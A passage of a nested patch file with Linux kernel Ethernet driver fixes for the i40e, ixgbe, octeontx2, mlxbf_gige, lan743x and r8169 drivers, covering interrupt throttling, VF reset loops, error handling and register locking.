+ #define I40E_PFINT_ICR0_INTEVENT_MASK I40E_MASK(0x1, I40E_PFINT_ICR0_INTEVENT_SHIFT)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 94cf82668efaa..3d83fccf742b1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2571,7 +2571,22 @@ static int i40e_clean_rx_irq(struct i40e_ring *rx_ring, int budget)
+ 	return failure ? budget : (int)total_rx_packets;
+ }
+ 
+-static inline u32 i40e_buildreg_itr(const int type, u16 itr)
++/**
++ * i40e_buildreg_itr - build a value for writing to I40E_PFINT_DYN_CTLN register
++ * @itr_idx: interrupt throttling index
++ * @interval: interrupt throttling interval value in usecs
++ * @force_swint: force software interrupt
++ *
++ * The function builds a value for I40E_PFINT_DYN_CTLN register that
++ * is used to update interrupt throttling interval for specified ITR index
++ * and optionally enforces a software interrupt. If the @itr_idx is equal
++ * to I40E_ITR_NONE then no interval change is applied and only @force_swint
++ * parameter is taken into account. If the interval change and enforced
++ * software interrupt are not requested then the built value just enables
++ * appropriate vector interrupt.
++ **/
++static u32 i40e_buildreg_itr(enum i40e_dyn_idx itr_idx, u16 interval,
++			     bool force_swint)
+ {
+ 	u32 val;
+ 
+@@ -2585,23 +2600,33 @@ static inline u32 i40e_buildreg_itr(const int type, u16 itr)
+ 	 * an event in the PBA anyway so we need to rely on the automask
+ 	 * to hold pending events for us until the interrupt is re-enabled
+ 	 *
+-	 * The itr value is reported in microseconds, and the register
+-	 * value is recorded in 2 microsecond units. For this reason we
+-	 * only need to shift by the interval shift - 1 instead of the
+-	 * full value.
++	 * We have to shift the given value as it is reported in microseconds
++	 * and the register value is recorded in 2 microsecond units.
+ 	 */
+-	itr &= I40E_ITR_MASK;
++	interval >>= 1;
+ 
++	/* 1. Enable vector interrupt
++	 * 2. Update the interval for the specified ITR index
++	 *    (I40E_ITR_NONE in the register is used to indicate that
++	 *     no interval update is requested)
++	 */
+ 	val = I40E_PFINT_DYN_CTLN_INTENA_MASK |
+-	      (type << I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT) |
+-	      (itr << (I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT - 1));
++	      FIELD_PREP(I40E_PFINT_DYN_CTLN_ITR_INDX_MASK, itr_idx) |
++	      FIELD_PREP(I40E_PFINT_DYN_CTLN_INTERVAL_MASK, interval);
++
++	/* 3. Enforce software interrupt trigger if requested
++	 *    (These software interrupts rate is limited by ITR2 that is
++	 *     set to 20K interrupts per second)
++	 */
++	if (force_swint)
++		val |= I40E_PFINT_DYN_CTLN_SWINT_TRIG_MASK |
++		       I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_MASK |
++		       FIELD_PREP(I40E_PFINT_DYN_CTLN_SW_ITR_INDX_MASK,
++				  I40E_SW_ITR);
+ 
+ 	return val;
+ }
+ 
+-/* a small macro to shorten up some long lines */
+-#define INTREG I40E_PFINT_DYN_CTLN
+-
+ /* The act of updating the ITR will cause it to immediately trigger. In order
+  * to prevent this from throwing off adaptive update statistics we defer the
+  * update so that it can only happen so often. So after either Tx or Rx are
+@@ -2620,8 +2645,10 @@ static inline u32 i40e_buildreg_itr(const int type, u16 itr)
+ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 					  struct i40e_q_vector *q_vector)
+ {
++	enum i40e_dyn_idx itr_idx = I40E_ITR_NONE;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	u32 intval;
++	u16 interval = 0;
++	u32 itr_val;
+ 
+ 	/* If we don't have MSIX, then we only need to re-enable icr0 */
+ 	if (!(vsi->back->flags & I40E_FLAG_MSIX_ENABLED)) {
+@@ -2643,8 +2670,8 @@ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 	 */
+ 	if (q_vector->rx.target_itr < q_vector->rx.current_itr) {
+ 		/* Rx ITR needs to be reduced, this is highest priority */
+-		intval = i40e_buildreg_itr(I40E_RX_ITR,
+-					   q_vector->rx.target_itr);
++		itr_idx = I40E_RX_ITR;
++		interval = q_vector->rx.target_itr;
+ 		q_vector->rx.current_itr = q_vector->rx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else if ((q_vector->tx.target_itr < q_vector->tx.current_itr) ||
+@@ -2653,25 +2680,36 @@ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 		/* Tx ITR needs to be reduced, this is second priority
+ 		 * Tx ITR needs to be increased more than Rx, fourth priority
+ 		 */
+-		intval = i40e_buildreg_itr(I40E_TX_ITR,
+-					   q_vector->tx.target_itr);
++		itr_idx = I40E_TX_ITR;
++		interval = q_vector->tx.target_itr;
+ 		q_vector->tx.current_itr = q_vector->tx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else if (q_vector->rx.current_itr != q_vector->rx.target_itr) {
+ 		/* Rx ITR needs to be increased, third priority */
+-		intval = i40e_buildreg_itr(I40E_RX_ITR,
+-					   q_vector->rx.target_itr);
++		itr_idx = I40E_RX_ITR;
++		interval = q_vector->rx.target_itr;
+ 		q_vector->rx.current_itr = q_vector->rx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else {
+ 		/* No ITR update, lowest priority */
+-		intval = i40e_buildreg_itr(I40E_ITR_NONE, 0);
+ 		if (q_vector->itr_countdown)
+ 			q_vector->itr_countdown--;
+ 	}
+ 
+-	if (!test_bit(__I40E_VSI_DOWN, vsi->state))
+-		wr32(hw, INTREG(q_vector->reg_idx), intval);
++	/* Do not update interrupt control register if VSI is down */
++	if (test_bit(__I40E_VSI_DOWN, vsi->state))
++		return;
++
++	/* Update ITR interval if necessary and enforce software interrupt
++	 * if we are exiting busy poll.
++	 */
++	if (q_vector->in_busy_poll) {
++		itr_val = i40e_buildreg_itr(itr_idx, interval, true);
++		q_vector->in_busy_poll = false;
++	} else {
++		itr_val = i40e_buildreg_itr(itr_idx, interval, false);
++	}
++	wr32(hw, I40E_PFINT_DYN_CTLN(q_vector->reg_idx), itr_val);
+ }
+ 
+ /**
+@@ -2778,6 +2816,8 @@ int i40e_napi_poll(struct napi_struct *napi, int budget)
+ 	 */
+ 	if (likely(napi_complete_done(napi, work_done)))
+ 		i40e_update_enable_itr(vsi, q_vector);
++	else
++		q_vector->in_busy_poll = true;
+ 
+ 	return min(work_done, budget - 1);
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h
+index 768290dc6f48b..6e567d343e031 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h
+@@ -57,7 +57,7 @@ static inline u16 i40e_intrl_usec_to_reg(int intrl)
+  * mentioning ITR_INDX, ITR_NONE cannot be used as an index 'n' into any
+  * register but instead is a special value meaning "don't update" ITR0/1/2.
+  */
+-enum i40e_dyn_idx_t {
++enum i40e_dyn_idx {
+ 	I40E_IDX_ITR0 = 0,
+ 	I40E_IDX_ITR1 = 1,
+ 	I40E_IDX_ITR2 = 2,
+@@ -67,6 +67,7 @@ enum i40e_dyn_idx_t {
+ /* these are indexes into ITRN registers */
+ #define I40E_RX_ITR    I40E_IDX_ITR0
+ #define I40E_TX_ITR    I40E_IDX_ITR1
++#define I40E_SW_ITR    I40E_IDX_ITR2
+ 
+ /* Supported RSS offloads */
+ #define I40E_DEFAULT_RSS_HENA ( \
+@@ -304,7 +305,7 @@ struct i40e_rx_queue_stats {
+ 	u64 page_busy_count;
+ };
+ 
+-enum i40e_ring_state_t {
++enum i40e_ring_state {
+ 	__I40E_TX_FDIR_INIT_DONE,
+ 	__I40E_TX_XPS_INIT_DONE,
+ 	__I40E_RING_STATE_NBITS /* must be last */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index ed4be80fec2a5..a5f0c95cba8b5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -1626,8 +1626,8 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+ 	struct i40e_vf *vf;
+-	int i, v;
+ 	u32 reg;
++	int i;
+ 
+ 	/* If we don't have any VFs, then there is nothing to reset */
+ 	if (!pf->num_alloc_vfs)
+@@ -1638,11 +1638,10 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 		return false;
+ 
+ 	/* Begin reset on all VFs at once */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
+-		vf = &pf->vf[v];
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* If VF is being reset no need to trigger reset again */
+ 		if (!test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+-			i40e_trigger_vf_reset(&pf->vf[v], flr);
++			i40e_trigger_vf_reset(vf, flr);
+ 	}
+ 
+ 	/* HW requires some time to make sure it can flush the FIFO for a VF
+@@ -1651,14 +1650,13 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	 * the VFs using a simple iterator that increments once that VF has
+ 	 * finished resetting.
+ 	 */
+-	for (i = 0, v = 0; i < 10 && v < pf->num_alloc_vfs; i++) {
++	for (i = 0, vf = &pf->vf[0]; i < 10 && vf < &pf->vf[pf->num_alloc_vfs]; ++i) {
+ 		usleep_range(10000, 20000);
+ 
+ 		/* Check each VF in sequence, beginning with the VF to fail
+ 		 * the previous check.
+ 		 */
+-		while (v < pf->num_alloc_vfs) {
+-			vf = &pf->vf[v];
++		while (vf < &pf->vf[pf->num_alloc_vfs]) {
+ 			if (!test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states)) {
+ 				reg = rd32(hw, I40E_VPGEN_VFRSTAT(vf->vf_id));
+ 				if (!(reg & I40E_VPGEN_VFRSTAT_VFRD_MASK))
+@@ -1668,7 +1666,7 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 			/* If the current VF has finished resetting, move on
+ 			 * to the next VF in sequence.
+ 			 */
+-			v++;
++			++vf;
+ 		}
+ 	}
+ 
+@@ -1678,39 +1676,39 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	/* Display a warning if at least one VF didn't manage to reset in
+ 	 * time, but continue on with the operation.
+ 	 */
+-	if (v < pf->num_alloc_vfs)
++	if (vf < &pf->vf[pf->num_alloc_vfs])
+ 		dev_err(&pf->pdev->dev, "VF reset check timeout on VF %d\n",
+-			pf->vf[v].vf_id);
++			vf->vf_id);
+ 	usleep_range(10000, 20000);
+ 
+ 	/* Begin disabling all the rings associated with VFs, but do not wait
+ 	 * between each VF.
+ 	 */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* On initial reset, we don't have any queues to disable */
+-		if (pf->vf[v].lan_vsi_idx == 0)
++		if (vf->lan_vsi_idx == 0)
+ 			continue;
+ 
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_vsi_stop_rings_no_wait(pf->vsi[pf->vf[v].lan_vsi_idx]);
++		i40e_vsi_stop_rings_no_wait(pf->vsi[vf->lan_vsi_idx]);
+ 	}
+ 
+ 	/* Now that we've notified HW to disable all of the VF rings, wait
+ 	 * until they finish.
+ 	 */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* On initial reset, we don't have any queues to disable */
+-		if (pf->vf[v].lan_vsi_idx == 0)
++		if (vf->lan_vsi_idx == 0)
+ 			continue;
+ 
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_vsi_wait_queues_disabled(pf->vsi[pf->vf[v].lan_vsi_idx]);
++		i40e_vsi_wait_queues_disabled(pf->vsi[vf->lan_vsi_idx]);
+ 	}
+ 
+ 	/* Hw may need up to 50ms to finish disabling the RX queues. We
+@@ -1719,12 +1717,12 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	mdelay(50);
+ 
+ 	/* Finish the reset on each VF */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_cleanup_reset_vf(&pf->vf[v]);
++		i40e_cleanup_reset_vf(vf);
+ 	}
+ 
+ 	i40e_flush(hw);
+@@ -3078,11 +3076,12 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 		/* Allow to delete VF primary MAC only if it was not set
+ 		 * administratively by PF or if VF is trusted.
+ 		 */
+-		if (ether_addr_equal(addr, vf->default_lan_addr.addr) &&
+-		    i40e_can_vf_change_mac(vf))
+-			was_unimac_deleted = true;
+-		else
+-			continue;
++		if (ether_addr_equal(addr, vf->default_lan_addr.addr)) {
++			if (i40e_can_vf_change_mac(vf))
++				was_unimac_deleted = true;
++			else
++				continue;
++		}
+ 
+ 		if (i40e_del_mac_filter(vsi, al->list[i].addr)) {
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
+index 774de63dd93a6..15fc2acffb871 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
+@@ -908,7 +908,13 @@ int ixgbe_ipsec_vf_add_sa(struct ixgbe_adapter *adapter, u32 *msgbuf, u32 vf)
+ 		goto err_out;
+ 	}
+ 
+-	xs = kzalloc(sizeof(*xs), GFP_KERNEL);
++	algo = xfrm_aead_get_byname(aes_gcm_name, IXGBE_IPSEC_AUTH_BITS, 1);
++	if (unlikely(!algo)) {
++		err = -ENOENT;
++		goto err_out;
++	}
++
++	xs = kzalloc(sizeof(*xs), GFP_ATOMIC);
+ 	if (unlikely(!xs)) {
+ 		err = -ENOMEM;
+ 		goto err_out;
+@@ -924,14 +930,8 @@ int ixgbe_ipsec_vf_add_sa(struct ixgbe_adapter *adapter, u32 *msgbuf, u32 vf)
+ 		memcpy(&xs->id.daddr.a4, sam->addr, sizeof(xs->id.daddr.a4));
+ 	xs->xso.dev = adapter->netdev;
+ 
+-	algo = xfrm_aead_get_byname(aes_gcm_name, IXGBE_IPSEC_AUTH_BITS, 1);
+-	if (unlikely(!algo)) {
+-		err = -ENOENT;
+-		goto err_xs;
+-	}
+-
+ 	aead_len = sizeof(*xs->aead) + IXGBE_IPSEC_KEY_BITS / 8;
+-	xs->aead = kzalloc(aead_len, GFP_KERNEL);
++	xs->aead = kzalloc(aead_len, GFP_ATOMIC);
+ 	if (unlikely(!xs->aead)) {
+ 		err = -ENOMEM;
+ 		goto err_xs;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index e6fe599f7bf3a..254cad45a555f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -814,6 +814,11 @@ static int cgx_lmac_enadis_pause_frm(void *cgxd, int lmac_id,
+ 	if (!is_lmac_valid(cgx, lmac_id))
+ 		return -ENODEV;
+ 
++	cfg = cgx_read(cgx, lmac_id, CGXX_GMP_GMI_RXX_FRM_CTL);
++	cfg &= ~CGX_GMP_GMI_RXX_FRM_CTL_CTL_BCK;
++	cfg |= rx_pause ? CGX_GMP_GMI_RXX_FRM_CTL_CTL_BCK : 0x0;
++	cgx_write(cgx, lmac_id, CGXX_GMP_GMI_RXX_FRM_CTL, cfg);
++
+ 	cfg = cgx_read(cgx, lmac_id, CGXX_SMUX_RX_FRM_CTL);
+ 	cfg &= ~CGX_SMUX_RX_FRM_CTL_CTL_BCK;
+ 	cfg |= rx_pause ? CGX_SMUX_RX_FRM_CTL_CTL_BCK : 0x0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index d1e6b12ecfa70..cc6d6c94f4002 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -160,6 +160,8 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+ 		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
++			if (iter >= MAX_LMAC_COUNT)
++				continue;
+ 			lmac = cgx_get_lmacid(rvu_cgx_pdata(cgx, rvu),
+ 					      iter);
+ 			rvu->pf2cgxlmac_map[pf] = cgxlmac_id_to_bmap(cgx, lmac);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 55639c133dd02..91a4ea529d077 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -1669,7 +1669,7 @@ static int npc_fwdb_detect_load_prfl_img(struct rvu *rvu, uint64_t prfl_sz,
+ 	struct npc_coalesced_kpu_prfl *img_data = NULL;
+ 	int i = 0, rc = -EINVAL;
+ 	void __iomem *kpu_prfl_addr;
+-	u16 offset;
++	u32 offset;
+ 
+ 	img_data = (struct npc_coalesced_kpu_prfl __force *)rvu->kpu_prfl_addr;
+ 	if (le64_to_cpu(img_data->signature) == KPU_SIGN &&
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 7e2c30927c312..6b7fb324e756e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1914,7 +1914,7 @@ int otx2_open(struct net_device *netdev)
+ 	 * mcam entries are enabled to receive the packets. Hence disable the
+ 	 * packet I/O.
+ 	 */
+-	if (err == EIO)
++	if (err == -EIO)
+ 		goto err_disable_rxtx;
+ 	else if (err)
+ 		goto err_tx_stop_queues;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index 83c4659390fd5..d6b4d163bbbfd 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -14,6 +14,7 @@
+ #include <linux/module.h>
+ #include <linux/phy.h>
+ #include <linux/platform_device.h>
++#include <linux/rtnetlink.h>
+ #include <linux/skbuff.h>
+ 
+ #include "mlxbf_gige.h"
+@@ -139,13 +140,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	control |= MLXBF_GIGE_CONTROL_PORT_EN;
+ 	writeq(control, priv->base + MLXBF_GIGE_CONTROL);
+ 
+-	err = mlxbf_gige_request_irqs(priv);
+-	if (err)
+-		return err;
+ 	mlxbf_gige_cache_stats(priv);
+ 	err = mlxbf_gige_clean_port(priv);
+ 	if (err)
+-		goto free_irqs;
++		return err;
+ 
+ 	/* Clear driver's valid_polarity to match hardware,
+ 	 * since the above call to clean_port() resets the
+@@ -157,7 +155,7 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	err = mlxbf_gige_tx_init(priv);
+ 	if (err)
+-		goto free_irqs;
++		goto phy_deinit;
+ 	err = mlxbf_gige_rx_init(priv);
+ 	if (err)
+ 		goto tx_deinit;
+@@ -166,6 +164,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	napi_enable(&priv->napi);
+ 	netif_start_queue(netdev);
+ 
++	err = mlxbf_gige_request_irqs(priv);
++	if (err)
++		goto napi_deinit;
++
+ 	/* Set bits in INT_EN that we care about */
+ 	int_en = MLXBF_GIGE_INT_EN_HW_ACCESS_ERROR |
+ 		 MLXBF_GIGE_INT_EN_TX_CHECKSUM_INPUTS |
+@@ -182,11 +184,17 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
++napi_deinit:
++	netif_stop_queue(netdev);
++	napi_disable(&priv->napi);
++	netif_napi_del(&priv->napi);
++	mlxbf_gige_rx_deinit(priv);
++
+ tx_deinit:
+ 	mlxbf_gige_tx_deinit(priv);
+ 
+-free_irqs:
+-	mlxbf_gige_free_irqs(priv);
++phy_deinit:
++	phy_stop(phydev);
+ 	return err;
+ }
+ 
+@@ -410,8 +418,13 @@ static void mlxbf_gige_shutdown(struct platform_device *pdev)
+ {
+ 	struct mlxbf_gige *priv = platform_get_drvdata(pdev);
+ 
+-	writeq(0, priv->base + MLXBF_GIGE_INT_EN);
+-	mlxbf_gige_clean_port(priv);
++	rtnl_lock();
++	netif_device_detach(priv->netdev);
++
++	if (netif_running(priv->netdev))
++		dev_close(priv->netdev);
++
++	rtnl_unlock();
+ }
+ 
+ static const struct acpi_device_id __maybe_unused mlxbf_gige_acpi_match[] = {
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index e804613faa1fc..d5123e8c4a9f4 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -25,6 +25,8 @@
+ #define PCS_POWER_STATE_DOWN	0x6
+ #define PCS_POWER_STATE_UP	0x4
+ 
++#define RFE_RD_FIFO_TH_3_DWORDS	0x3
++
+ static void pci11x1x_strap_get_status(struct lan743x_adapter *adapter)
+ {
+ 	u32 chip_rev;
+@@ -3217,6 +3219,21 @@ static void lan743x_full_cleanup(struct lan743x_adapter *adapter)
+ 	lan743x_pci_cleanup(adapter);
+ }
+ 
++static void pci11x1x_set_rfe_rd_fifo_threshold(struct lan743x_adapter *adapter)
++{
++	u16 rev = adapter->csr.id_rev & ID_REV_CHIP_REV_MASK_;
++
++	if (rev == ID_REV_CHIP_REV_PCI11X1X_B0_) {
++		u32 misc_ctl;
++
++		misc_ctl = lan743x_csr_read(adapter, MISC_CTL_0);
++		misc_ctl &= ~MISC_CTL_0_RFE_READ_FIFO_MASK_;
++		misc_ctl |= FIELD_PREP(MISC_CTL_0_RFE_READ_FIFO_MASK_,
++				       RFE_RD_FIFO_TH_3_DWORDS);
++		lan743x_csr_write(adapter, MISC_CTL_0, misc_ctl);
++	}
++}
++
+ static int lan743x_hardware_init(struct lan743x_adapter *adapter,
+ 				 struct pci_dev *pdev)
+ {
+@@ -3232,6 +3249,7 @@ static int lan743x_hardware_init(struct lan743x_adapter *adapter,
+ 		pci11x1x_strap_get_status(adapter);
+ 		spin_lock_init(&adapter->eth_syslock_spinlock);
+ 		mutex_init(&adapter->sgmii_rw_lock);
++		pci11x1x_set_rfe_rd_fifo_threshold(adapter);
+ 	} else {
+ 		adapter->max_tx_channels = LAN743X_MAX_TX_CHANNELS;
+ 		adapter->used_tx_channels = LAN743X_USED_TX_CHANNELS;
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.h b/drivers/net/ethernet/microchip/lan743x_main.h
+index 67877d3b6dd98..d304be17b9d82 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.h
++++ b/drivers/net/ethernet/microchip/lan743x_main.h
+@@ -26,6 +26,7 @@
+ #define ID_REV_CHIP_REV_MASK_		(0x0000FFFF)
+ #define ID_REV_CHIP_REV_A0_		(0x00000000)
+ #define ID_REV_CHIP_REV_B0_		(0x00000010)
++#define ID_REV_CHIP_REV_PCI11X1X_B0_	(0x000000B0)
+ 
+ #define FPGA_REV			(0x04)
+ #define FPGA_REV_GET_MINOR_(fpga_rev)	(((fpga_rev) >> 8) & 0x000000FF)
+@@ -311,6 +312,9 @@
+ #define SGMII_CTL_LINK_STATUS_SOURCE_	BIT(8)
+ #define SGMII_CTL_SGMII_POWER_DN_	BIT(1)
+ 
++#define MISC_CTL_0			(0x920)
++#define MISC_CTL_0_RFE_READ_FIFO_MASK_	GENMASK(6, 4)
++
+ /* Vendor Specific SGMII MMD details */
+ #define SR_VSMMD_PCS_ID1		0x0004
+ #define SR_VSMMD_PCS_ID2		0x0005
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 06663c11ca96d..6e3417712e402 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -615,6 +615,9 @@ struct rtl8169_private {
+ 		struct work_struct work;
+ 	} wk;
+ 
++	spinlock_t config25_lock;
++	spinlock_t mac_ocp_lock;
++
+ 	unsigned supports_gmii:1;
+ 	unsigned aspm_manageable:1;
+ 	unsigned dash_enabled:1;
+@@ -678,6 +681,28 @@ static void rtl_pci_commit(struct rtl8169_private *tp)
+ 	RTL_R8(tp, ChipCmd);
+ }
+ 
++static void rtl_mod_config2(struct rtl8169_private *tp, u8 clear, u8 set)
++{
++	unsigned long flags;
++	u8 val;
++
++	spin_lock_irqsave(&tp->config25_lock, flags);
++	val = RTL_R8(tp, Config2);
++	RTL_W8(tp, Config2, (val & ~clear) | set);
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
++}
++
++static void rtl_mod_config5(struct rtl8169_private *tp, u8 clear, u8 set)
++{
++	unsigned long flags;
++	u8 val;
++
++	spin_lock_irqsave(&tp->config25_lock, flags);
++	val = RTL_R8(tp, Config5);
++	RTL_W8(tp, Config5, (val & ~clear) | set);
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
++}
++
+ static bool rtl_is_8125(struct rtl8169_private *tp)
+ {
+ 	return tp->mac_version >= RTL_GIGA_MAC_VER_61;
+@@ -850,7 +875,7 @@ static int r8168_phy_ocp_read(struct rtl8169_private *tp, u32 reg)
+ 		(RTL_R32(tp, GPHY_OCP) & 0xffff) : -ETIMEDOUT;
+ }
+ 
+-static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
++static void __r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
+ {
+ 	if (rtl_ocp_reg_failure(reg))
+ 		return;
+@@ -858,7 +883,16 @@ static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
+ 	RTL_W32(tp, OCPDR, OCPAR_FLAG | (reg << 15) | data);
+ }
+ 
+-static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
++static void r8168_mac_ocp_write(struct rtl8169_private *tp, u32 reg, u32 data)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	__r8168_mac_ocp_write(tp, reg, data);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
++}
++
++static u16 __r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
+ {
+ 	if (rtl_ocp_reg_failure(reg))
+ 		return 0;
+@@ -868,12 +902,28 @@ static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
+ 	return RTL_R32(tp, OCPDR);
+ }
+ 
++static u16 r8168_mac_ocp_read(struct rtl8169_private *tp, u32 reg)
++{
++	unsigned long flags;
++	u16 val;
++
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	val = __r8168_mac_ocp_read(tp, reg);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
++
++	return val;
++}
++
+ static void r8168_mac_ocp_modify(struct rtl8169_private *tp, u32 reg, u16 mask,
+ 				 u16 set)
+ {
+-	u16 data = r8168_mac_ocp_read(tp, reg);
++	unsigned long flags;
++	u16 data;
+ 
+-	r8168_mac_ocp_write(tp, reg, (data & ~mask) | set);
++	spin_lock_irqsave(&tp->mac_ocp_lock, flags);
++	data = __r8168_mac_ocp_read(tp, reg);
++	__r8168_mac_ocp_write(tp, reg, (data & ~mask) | set);
++	spin_unlock_irqrestore(&tp->mac_ocp_lock, flags);
+ }
+ 
+ /* Work around a hw issue with RTL8168g PHY, the quirk disables
+@@ -1135,17 +1185,40 @@ static void rtl8168ep_stop_cmac(struct rtl8169_private *tp)
+ 	RTL_W8(tp, IBCR0, RTL_R8(tp, IBCR0) & ~0x01);
+ }
+ 
++static void rtl_dash_loop_wait(struct rtl8169_private *tp,
++			       const struct rtl_cond *c,
++			       unsigned long usecs, int n, bool high)
++{
++	if (!tp->dash_enabled)
++		return;
++	rtl_loop_wait(tp, c, usecs, n, high);
++}
++
++static void rtl_dash_loop_wait_high(struct rtl8169_private *tp,
++				    const struct rtl_cond *c,
++				    unsigned long d, int n)
++{
++	rtl_dash_loop_wait(tp, c, d, n, true);
++}
++
++static void rtl_dash_loop_wait_low(struct rtl8169_private *tp,
++				   const struct rtl_cond *c,
++				   unsigned long d, int n)
++{
++	rtl_dash_loop_wait(tp, c, d, n, false);
++}
++
